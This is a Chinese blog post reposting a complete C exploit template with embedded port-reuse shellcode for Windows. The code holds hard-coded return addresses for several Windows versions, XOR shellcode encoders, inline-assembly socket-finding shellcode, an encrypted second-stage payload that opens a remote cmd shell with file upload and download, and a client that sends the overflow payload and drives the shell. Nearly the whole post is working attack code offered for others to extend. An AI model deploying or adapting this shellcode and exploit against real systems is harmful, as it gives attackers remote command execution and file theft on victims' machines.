端口复用shellcode

2009/03/13 12:50 | 鬼仔 | 工具收集 | 占个座先

作者:

硬盘里有很多使用各种各样的技巧来实现端口复用的shellcode,都是以前写的。翻出来一个比较矬的,贴到这里。想扩展的朋友可以自己改。 这个shellcode也可以很方便的扩展为写C/S类型的exploit模板

这是 stage1 shellcode。

怀旧shellcode系列就贴到此为止了,老是在blog上贴这种代码似乎没什么人看。

/*
author: [email protected]
Team: Ph4nt0m Security Team(http://www.ph4nt0m.org)
Date: 2007

*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <io.h>
#pragma comment (lib,”ws2_32″)

struct OSTYPE
{
unsigned char ret[8];
char des[255];
};

OSTYPE os[] = {
{“\xe1\x1e\xfa\x7f”, “Windows CN ALL POP/POP/RET”},
{“\x5a\x21\x01\x78”, “Windows2000 SP3/SP4 ALL POP/POP/RET msvcrt.dll”},
{“\x12\x45\xfa\x7f”, “Windows CN JMPESP address from Chinese Ansi Code Page”},
{“\x34\x33\x80\x7c”, “Windows2003 CN SP1 CALL EAX”},
{“\x9f\xd6\xc1\x77”, “WindowsXP CN SP2 JMP EAX”},
{“\x41\x42\x43\x44”, “Ret Addr For Test”}
};

#define POP_POP_RET “\xfd\x2e\x92\x7c” //pop ebp,pop ebx,ret xp sp2 cn

char Payload[400] = “”; //server.exe

#define Magic_Len 1102

// 1098 +4 = 1102 bytes put/get 文件传输,传输加密 Xor_key = 0x33
char magic_shellcode[] =
“axis\x53\xe9\xd3\x03\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c”
“\x8b\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x0e\x59\xe8\x73\x03\x00”
“\x00\xe2\xf9\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\xff\x16”
“\x8b\xe8\x6a\x0d\x59\xe8\x5a\x03\x00\x00\xe2\xf9\x83\xc4\x08\x5b”
“\x89\x5e\x70\x6a\x01\x6a\x00\x6a\x0c\x8b\xdc\x68\xff\x00\x00\x00”
“\x53\x8d\x56\x74\x52\x83\xc2\x04\x52\xff\x56\x0c\x68\x5c\x30\x00”
“\x00\x68\x70\x69\x70\x65\x68\x5c\x5c\x2e\x5c\x8b\xfc\x33\xc0\x50”
“\x50\x50\x50\x68\xff\x00\x00\x00\x50\x68\x03\x00\x00\x40\x57\xff”
“\x56\x10\x89\x86\x80\x00\x00\x00\x33\xc0\x50\x50\x6a\x03\x53\x50”
“\x68\x00\x00\x00\x02\x57\xff\x56\x24\x89\x46\x7c\x68\x63\x6d\x64”
“\x00\x8d\x14\x24\x83\xec\x54\x8b\xfc\x6a\x14\x59\x33\xc0\x89\x04”
“\x8f\xe2\xfb\xc6\x47\x10\x44\xfe\x47\x3c\xfe\x47\x3d\xff\x76\x78”
“\x5b\x89\x5f\x48\xff\x76\x7c\x5b\x89\x5f\x4c\x89\x5f\x50\x8d\x47”
“\x10\x57\x50\x51\x51\x51\x6a\x01\x51\x51\x52\x51\xff\x56\x04\xff”
“\x37\x8f\x86\x84\x00\x00\x00\xff\x77\x04\x8f\x86\x88\x00\x00\x00”
“\xff\x76\x78\xff\x56\x14\xff\x76\x7c\xff\x56\x14\x83\xc4\x6c\x33”
“\xc0\x50\x6a\x01\x6a\x01\x50\xff\x56\x18\x89\x86\x8c\x00\x00\x00”
“\x33\xdb\x89\x9e\xa4\x00\x00\x00\x89\x86\xa8\x00\x00\x00\xff\x56”
“\x58\x89\x86\x90\x00\x00\x00\xc7\x86\x94\x00\x00\x00\x00\x00\x00”
“\x00\x6a\x21\xff\xb6\x90\x00\x00\x00\xff\x76\x70\xff\x56\x5c\x33”
“\xc0\x48\x50\x40\x50\x8d\x9e\x8c\x00\x00\x00\x53\x6a\x02\xff\x56”
“\x1c\x50\x8d\x9e\xf0\x00\x00\x00\x53\xff\xb6\x90\x00\x00\x00\xff”
“\x76\x70\xff\x56\x60\x6a\x00\xff\xb6\x90\x00\x00\x00\xff\x76\x70”
“\xff\x56\x5c\x6a\x00\x54\x68\x7e\x66\x04\x80\xff\x76\x70\xff\x56”
“\x64\x58\x59\xe3\x5c\x49\x0f\x85\xdb\x00\x00\x00\x6a\x00\x6a\x40”
“\x8d\x96\xf0\x00\x00\x00\x52\xff\x76\x70\xff\x56\x50\x8d\x96\xf0”
“\x00\x00\x00\x50\x59\xe8\xe2\x01\x00\x00\x81\xbe\xf0\x00\x00\x00”
“\x67\x65\x74\x20\x0f\x84\xe4\x00\x00\x00\x81\xbe\xf0\x00\x00\x00”
“\x70\x75\x74\x20\x0f\x84\x43\x01\x00\x00\x6a\x00\x8d\x9e\xac\x00”
“\x00\x00\x53\x50\x8d\x9e\xf0\x00\x00\x00\x53\xff\x76\x74\xff\x56”
“\x2c\x8b\x8e\x94\x00\x00\x00\xe3\x1d\x50\x8d\x9e\xac\x00\x00\x00”
“\x53\x8d\x9e\x98\x00\x00\x00\x53\xff\xb6\x80\x00\x00\x00\xff\x56”
“\x20\x91\xe3\x63\xeb\x2e\x8d\x9e\x98\x00\x00\x00\x53\x8d\x9e\xac”
“\x00\x00\x00\x53\x6a\x40\x8d\x9e\xb0\x00\x00\x00\x53\xff\xb6\x80”
“\x00\x00\x00\xff\x56\x28\xff\x86\x94\x00\x00\x00\x85\xc0\x0f\x84”
“\xfd\xfe\xff\xff\x8d\x96\xb0\x00\x00\x00\xff\xb6\xac\x00\x00\x00”
“\x59\xe8\x46\x01\x00\x00\xff\x8e\x94\x00\x00\x00\x6a\x00\x8b\x9e”
“\xac\x00\x00\x00\x53\x8d\x9e\xb0\x00\x00\x00\x53\xff\x76\x70\xff”
“\x56\x54\xe9\xca\xfe\xff\xff\xff\xb6\x84\x00\x00\x00\xff\x56\x08”
“\xff\xb6\x84\x00\x00\x00\xff\xb6\x88\x00\x00\x00\xff\xb6\x80\x00”
“\x00\x00\xff\x76\x74\xff\x56\x14\xff\x56\x14\xff\x56\x14\xff\x56”
“\x14\xff\x76\x70\xff\x56\x68\x33\xc0\x48\x50\xff\x56\x08\xc6\x84”
“\x06\xef\x00\x00\x00\x00\x8d\x96\xf4\x00\x00\x00\x33\xc0\x50\x50”
“\x6a\x03\x50\x50\x68\x00\x00\x00\x02\x52\xff\x56\x24\x89\x46\x7c”
“\x6a\x00\x8d\x96\xac\x00\x00\x00\x52\x6a\x40\x8d\x96\xb0\x00\x00”
“\x00\x52\xff\x76\x7c\xff\x56\x28\x8b\x8e\xac\x00\x00\x00\xe3\x22”
“\x8d\x96\xb0\x00\x00\x00\xe8\xa1\x00\x00\x00\x6a\x00\xff\xb6\xac”
“\x00\x00\x00\x8d\x96\xb0\x00\x00\x00\x52\xff\x76\x70\xff\x56\x54”
“\xeb\xbe\xff\x76\x7c\xff\x56\x14\xe9\x24\xfe\xff\xff\xc6\x84\x06”
“\xef\x00\x00\x00\x00\x8d\x96\xf4\x00\x00\x00\x33\xc0\x50\x50\x6a”
“\x02\x50\x50\x68\x00\x00\x00\x02\x52\xff\x56\x24\x89\x46\x7c\x6a”
“\x00\x6a\x40\x8d\x96\xb0\x00\x00\x00\x52\xff\x76\x70\xff\x56\x50”
“\x8d\x96\xb0\x00\x00\x00\x50\x59\xe8\x3f\x00\x00\x00\x6a\x00\x8d”
“\x96\xac\x00\x00\x00\x52\x50\x8d\x96\xb0\x00\x00\x00\x52\xff\x76”
“\x7c\xff\x56\x2c\x6a\x00\x54\x68\x7f\x66\x04\x40\xff\x76\x70\xff”
“\x56\x64\x59\xe3\x02\xeb\xb8\xff\x76\x7c\xff\x56\x14\xc6\x86\xf0”
“\x00\x00\x00\x0a\x6a\x01\x58\xe9\x3e\xfe\xff\xff\x4a\x80\x34\x0a”
“\x33\xe2\xfa\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56”
“\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe”
“\x10\x3a\xd6\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1\x3b\x1f\x75”
“\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd”
“\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x28\xfc\xff\xff\x32\x74”
“\x91\x0c\xc9\xbc\xa6\x6b\x8f\xf2\x18\x61\x4a\x79\x19\x7a\xa8\x4b”
“\x60\x9e\x57\x66\x0d\xff\x76\x91\x4d\x6d\x88\x58\xb3\xac\x8a\x87”
“\x66\x62\x93\x32\xe4\x94\xb2\x36\x0f\x13\xc4\x8d\x1f\x74\xd3\x88”
“\x28\x49\xa0\x65\x97\xcb\x3d\x6a\xb4\x80\x2d\x32\x78\xde\x98\xc4”
“\xb9\xde\x64\x10\xa7\xdd\x0c\x9f\xd3\x4b\xb1\x1e\x97\x01\x76\x90”
“\x97\xc7\x64\x98\x97\xdd\x96\xd5\xd5\xa8\x9c\x07\xdc\x5a\xd8\x10”
“\x27\xa7\x52\x83\xe9\xea\x4c\x0f\x29\xd1”;

//char Payload[1600] = “”; //server_big.exe

#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90\
__asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90
#define PROC_END PROC_BEGIN

unsigned char sh_Buff[2048]; // recv real shellcode
unsigned int sh_Len;
unsigned int Enc_key=0x99; //其实无关紧要,动态寻找

#define Xor_key 0x33 //加密传输

unsigned char decode1[] =
/*
00401004 . /EB 0E JMP SHORT encode.00401014
00401006 $ |5B POP EBX
00401007 . |4B DEC EBX
00401008 . |33C9 XOR ECX,ECX
0040100A . |B1 FF MOV CL,0FF
0040100C > |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99
00401010 .^|E2 FA LOOPD SHORT encode.0040100C
00401012 . |EB 05 JMP SHORT encode.00401019
00401014 > \E8 EDFFFFFF CALL encode.00401006
*/
“\xEB\x0E\x5B\x4B\x33\xC9\xB1”
“\xFF” // shellcode size
“\x80\x34\x0B”
“\x99” // xor byte
“\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF”;

unsigned
char decode2[] =
/* ripped from eyas
00406030 /EB 10 JMP SHORT 00406042
00406032 |5B POP EBX
00406033 |4B DEC EBX
00406034 |33C9 XOR ECX,ECX
00406036 |66:B9 6601 MOV CX,166
0040603A |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99
0040603E ^|E2 FA LOOPD SHORT 0040603A
00406040 |EB 05 JMP SHORT 00406047
00406042 \E8 EBFFFFFF CALL 00406032
*/
“\xEB\x10\x5B\x4B\x33\xC9\x66\xB9”
“\x66\x01” // shellcode size
“\x80\x34\x0B”
“\x99” // xor byte
“\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF”;

// kernel32.dll functions index
#define _LoadLibraryA 0x00
#define _WaitForSingleObjectEx 0x04
#define _Sleep 0x08

// ws2_32.dll functions index
#define _recv 0x0c
#define _ioctlsocket 0x10

// functions number
#define _Knums 3
#define _Wnums 2

// Need functions
unsigned char functions[100][128] =
{
// kernel32
{“LoadLibraryA”},
{“WaitForSingleObjectEx”},
{“Sleep”},
// ws2_32
{“recv”},
{“ioctlsocket”},
{“”},
};

void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();

// Get function hash
unsigned long hash(unsigned char *c)
{
unsigned long h=0;
while(*c)
{
h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++;
}
return h;
}

// get shellcode
void GetShellCode()
{
char *fnbgn_str=”\x90\x90\x90\x90\x90\x90\x90\x90\x90″;
char *fnend_str=”\x90\x90\x90\x90\x90\x90\x90\x90\x90″;
unsigned char *pSc_addr;
unsigned char pSc_Buff[1024];
unsigned int MAX_Sc_Len=0x2000;
unsigned long dwHash[100];
unsigned int dwHashSize;

unsigned int l,i,j,k;

// Get functions hash
for (i=0;;i++) {
if (functions[i][0] == ‘\x0’) break;

dwHash[i] = hash(functions[i]);
//fprintf(stderr, “%.8X\t%s\n”, dwHash[i], functions[i]);
}
dwHashSize = i*4;

// Deal with shellcode
pSc_addr = (unsigned char *)ShellCode;

for (k=0;k<MAX_Sc_Len;++k ) {
if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) {
break;
}
}
pSc_addr+=(k+8); // start of the ShellCode

for (k=0;k<MAX_Sc_Len;++k) {
if(memcmp(pSc_addr+k,fnend_str, 8)==0) {
break;
}
}
sh_Len=k; // length of the ShellCode

memcpy(pSc_Buff, pSc_addr, sh_Len);

// Add functions hash
memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash, dwHashSize);
sh_Len += dwHashSize;

printf(“%d bytes shellcode\n”, sh_Len);
// print shellcode
PrintSc(pSc_Buff, sh_Len);

// find xor byte
for(i=0xff; i>0; i–)
{
l = 0;
for(j=0; j<sh_Len; j++)
{
if (
// ((pSc_Buff[j] ^ i) == 0x26) || //%
// ((pSc_Buff[j] ^ i) == 0x3d) || //=
// ((pSc_Buff[j] ^ i) == 0x3f) || //?
((pSc_Buff[j] ^ i) == 0x40) || //@
((pSc_Buff[j] ^ i) == 0x00) ||
((pSc_Buff[j] ^ i) == 0x0D) ||
((pSc_Buff[j] ^ i) == 0x3c) || // <
((pSc_Buff[j] ^ i) == 0x3e) || // >
((pSc_Buff[j] ^ i) == 0x2a) || // *
((pSc_Buff[j] ^ i) == 0x3a) || // :
((pSc_Buff[j] ^ i) == 0x20) || // 空格
((pSc_Buff[j] ^ i) == 0x22) || // ”
((pSc_Buff[j] ^ i) == 0x0A) ||
((pSc_Buff[j] ^ i) == 0x2F) || // /
((pSc_Buff[j] ^ i) == 0x5C) // “\”
)
{
l++;
break;
};
}

if (l==0)
{
Enc_key = i;
//printf(“Find XOR Byte: 0x%02X\n”, i);
for(j=0; j<sh_Len; j++)
{
pSc_Buff[j] ^= Enc_key;
}

break; // break when found xor byte
}
}

// No xor byte found
if (l!=0){
//fprintf(stderr, “No xor byte found!\n”);

sh_Len = 0;
}
else {
//fprintf(stderr, “Xor byte 0x%02X\n”, Enc_key);

// encode
if (sh_Len > 0xFF) {
*(unsigned short *)&decode2[8] = sh_Len;
*(unsigned char *)&decode2[13] = Enc_key;

memcpy(sh_Buff, decode2, sizeof(decode2)-1);
memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode2)-1;
}
else {
*(unsigned char *)&decode1[7] = sh_Len;
*(unsigned char *)&decode1[11] = Enc_key;

memcpy(sh_Buff, decode1, sizeof(decode1)-1);
memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode1)-1;
}
}
}

// print shellcode
void PrintSc(unsigned char *lpBuff, int buffsize)
{
int i,j;
char *p;
char msg[4];
fprintf(stderr, “/* %d bytes */\n”,buffsize);
for(i=0;i<buffsize;i++)
{
if((i%16)==0)
if(i!=0)
fprintf(stderr, “\”\n\””);
else
fprintf(stderr, “\””);
sprintf(msg,”\\x%.2X”,lpBuff[i]&0xff);
for( p = msg, j=0; j < 4; p++, j++ )
{
if(isupper(*p))
fprintf(stderr, “%c”, _tolower(*p));
else
fprintf(stderr, “%c”, p[0]);
}
}
fprintf(stderr, “\”;\n”);
}

// recv real shellcode function
void ShellCode()
{
__asm{

PROC_BEGIN //C macro to begin proc

jmp locate_addr
func_start:
pop edi ; get eip
mov eax, fs:30h
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8] ; base address of kernel32.dll
mov esi, edi
push _Knums
pop ecx

GetKFuncAddr: ; find functions from kernel32.dll
call find_hashfunc_addr
loop GetKFuncAddr

push 3233h
push 5F327377h ; ws2_32
push esp
call dword ptr [esi+_LoadLibraryA]
mov ebp, eax ; base address of ws2_32.dll
push _Wnums
pop ecx

GetWFuncAddr: ; find functions from ws2_32.dll
call find_hashfunc_addr
loop GetWFuncAddr

//find_s:
xor ebx, ebx
push 1000 ; sleep to wait for character send
call dword ptr [esi+_Sleep] ; maybe it is necessary in real internet

sub esp, 2000 ;在栈里分配空间,这里是2000 放在loop前比较稳定
mov edi, esp ; 把edi指过来

find_s_loop:
inc ebx ; socket

push 1
push 10
push ebx
call dword ptr [esi+_WaitForSingleObjectEx]

test eax, eax ; ensure ebx is socket
jnz find_s_loop

push 0
push esp ; 指向命令参数的指针,这里最好找个为内容空的地址。
push 4004667Fh ; FIONREAD
push ebx ;socket
call dword ptr [esi+_ioctlsocket]
pop ecx ; ensure this socket have 4 bit to read
cmp ecx, Magic_Len
jne find_s_loop

push 0
push Magic_Len ;shellcode recv的长度
push edi ;shellcode 要写入的地址,这里在栈里
push ebx
call dword ptr [esi+_recv]

mov esp, edi
pop eax
cmp eax, 73697861h ; recieve “axis”?
jnz find_s_loop

jmp esp ;直接jmp esp去执行我们的shellcode,因为前面的axis四字节,这里shellcode起址正好是esp

// int 3 //0xcc 调试shellcode用

find_hashfunc_addr:
push ecx
push esi
mov esi, [ebp+3Ch] ; e_lfanew
mov esi, [esi+ebp+78h] ; ExportDirectory RVA
add esi, ebp ; rva2va
push esi
mov esi, [esi+20h] ; AddressOfNames RVA
add esi, ebp ; rva2va
xor ecx, ecx
dec ecx

find_start:
inc ecx
lodsd
add eax, ebp
xor ebx, ebx

hash_loop:
movsx edx, byte ptr [eax]
cmp dl, dh
jz short find_addr
ror ebx, 7 ; hash
add ebx, edx
inc eax
jmp short hash_loop

find_addr:
cmp ebx, [edi] ; compare to hash
jnz short find_start
pop esi ; ExportDirectory
mov ebx, [esi+24h] ; AddressOfNameOrdinals RVA
add ebx, ebp ; rva2va
mov cx, [ebx+ecx*2] ; FunctionOrdinal
mov ebx, [esi+1Ch] ; AddressOfFunctions RVA
add ebx, ebp ; rva2va
mov eax, [ebx+ecx*4] ; FunctionAddress RVA
add eax, ebp ; rva2va
stosd ; function address save to [edi]
pop esi
pop ecx
retn

locate_addr:
call func_start

PROC_END //C macro to end proc

}

}
void Make_Payload(int q)
{
// server.exe
memset(Payload, 0x90, sizeof(Payload)-1);
memcpy(Payload + 52, &os[q].ret, 4);
strcpy(Payload + 56, (const char *)sh_Buff);
memcpy(Payload + 56 + strlen((const char *)sh_Buff), “\x90”, 1); //为了填充strcpy shellcode后所造成的\x00

/*
//server_big.exe jmp esp
memset(Payload, 0x90, sizeof(Payload)-1);
memcpy(Payload + 1204, &os[q].ret, 4);
strcpy(Payload + 1208, (const char *)sh_Buff);
memcpy(Payload + 1208 + strlen((const char *)sh_Buff), “\x90”, 1);
*/

/*
// server_big.exe overwrite esp+8 (seh)
// server_big.exe 覆盖 SEH
memset(Payload, 0x90, sizeof(Payload)-1);
memcpy(Payload + 1204, POP_POP_RET, 4); //覆盖 eip pop/pop/ret
memcpy(Payload + 1208, &os[q].ret, 4); // 覆盖 esp
memcpy(Payload + 1212, &os[q].ret, 4); // 覆盖 esp+4
memcpy(Payload + 1216, &os[q].ret, 4); // 覆盖 SEH jmp esp

// memcpy(Payload + 1220, “\x00”, 1);
strcpy(Payload + 1220, (const char *)sh_Buff);
memcpy(Payload + 1220 + strlen((const char *)sh_Buff), “\x90”, 1);
*/

PrintSc((unsigned char *)Payload, sizeof(Payload));

}

// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;

s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;

target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}

void xor_buf(unsigned char *buf, int size)
{
int i;

for (i=0; i<size; i++) {
buf[i] ^= Xor_key;
}

return;
}

/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l,i,size=0,get_size=0;
char buf[1024];
char filename[128];
HANDLE hFile;
fd_set FdRead;

struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
time.tv_usec = 0;

while (1)
{
ul[0] = 1;
ul[1] = sock;

l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l==1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf (“[-] Connection closed.\n”);
return;
}

xor_buf((unsigned char *)buf, l);
l = write (1, buf, l);
if (l <= 0)
{
printf (“[-] Connection closed.\n”);
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf(“[-] Connection closed.\n”);
return;
}

xor_buf((unsigned char *)buf, l);
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf(“[-] Connection closed.\n”);
return;
}

xor_buf((unsigned char *)buf, l);

//+——————————————–
// get xxx download xxx
// put xxx upload xxx
//+——————————————–
if (strncmp(buf, “get”, 3) == 0)
{
// obtain filename
buf[l-1] = 0;
for (i=l;i>0;i–) {
if (buf[i] == ‘\\’ || buf[i] == ‘ ‘) {
break;
}
}
strncpy(filename, buf+i+1, l-i-1);

hFile = CreateFile(
filename,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ARCHIVE,
(HANDLE)NULL
);

if ( hFile == INVALID_HANDLE_VALUE ) {
printf(“Create File %s Error!\n”, filename);
continue;
}

size = 0;

FD_ZERO(&FdRead);
FD_SET(sock, &FdRead);

for (;;) {
l = recv(sock, buf, sizeof(buf), 0);
xor_buf((unsigned char *)buf, l);

WriteFile(hFile, buf, l, (unsigned long *)&i, NULL);

size += i;

l = select (0, &FdRead, NULL, NULL, &time);

if (l != 1) {
memset(buf, 0x0a, 1);
xor_buf((unsigned char *)buf, 1);
l = send(sock, buf, 1, 0);
break;
}
}

printf(“Download remote file %s (%d bytes)!\n”, filename, size);

CloseHandle(hFile);
}
else if (strncmp(buf, “put”, 3) == 0)
{
Sleep(1000);

// obtain filename
buf[l-1] = 0;
for (i=l;i>0;i–) {
if (buf[i] == ‘\\’ || buf[i] == ‘ ‘) {
break;
}
}
strncpy(filename, buf+i+1, l-i-1);

// open file
hFile = CreateFile(
filename,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ARCHIVE,
(HANDLE)NULL
);

if ( hFile == INVALID_HANDLE_VALUE ) {
printf(“Open File %s Error!\n”, filename);
continue;
}

size = 0;

// read file and send
for (;;)
{
ReadFile(hFile, buf, 1024, (unsigned long *)&i, NULL);

if (i == 0)
{
break;
}

xor_buf((unsigned char *)buf, i);
l = send(sock, buf, i, 0);

size += l;
}

printf(“Upload remote file %s (%d bytes)…”, filename, size);

l = recv (sock, buf, sizeof (buf), 0);
xor_buf((unsigned char *)buf, l);

l = write (1, buf, l);

CloseHandle(hFile);
}
}
}
}

void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}

void help(char *n)
{
printf(“+——————————————————–+\n”);
printf(” Reuse port (Find Sock) Exploit by axis@ph4nt0m\n”);
printf(” Ver 1.0 Please Keep it Private!\n”);
printf(“+——————————————————–+\n”);
printf(” Usage:\n”);
printf(” %s [Target IP] [Target Port] [OSType]\n\n”, n);
printf(” == OSType:\n”);
printf(” 0. Windows CN ALL SP1 POP/POP/RET \n”);
printf(” 1. Windows2000 SP3/SP4 ALL POP/POP/RET\n”);
printf(” 2. Windows CN ALL JMP ESP from ansi page\n”);
printf(” 3. Windows2003 CN SP1 CALL EAX\n”);
printf(” 4. WindowsXP CN SP2 JMP EAX\n”);
printf(” 5. TEST RET\n”);

}

int main(int argc, char *argv[])
{
unsigned short port = 25;

SOCKET s;
WSADATA WSAData;

if(argc != 4)
{
help(argv[0]);
return 0;
}

if(argc == 4) port = atoi(argv[2]);

GetShellCode();
if (!sh_Len)
{
printf(“[-] Shellcode generate error.\n”);
exit(1);
}

printf(“shellcode length is: %d \n”,strlen((char *)sh_Buff));

if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
fprintf(stderr, “[-] WSAStartup failed.\n”);
WSACleanup();
exit(1);
}

s = Make_Connection(argv[1], port, 10);
if(s<0)
{
fprintf(stderr, “[-] connect err.\n”);
exit(1);
}

//OS type
int p = 0;
if(argc > 3)
p = atoi(argv[3]);

Make_Payload(p);

//Send our evil Payload
printf(“[+]Sending our Evil Payload.\n”);

send(s, Payload, sizeof(Payload), 0);
Sleep(100);

// send real shellcode
send(s, magic_shellcode, Magic_Len, 0);

Sleep(1000);

// use same socket to get shell
shell(s);

WSACleanup();
return 1;
}

Tags:

相关日志

发表评论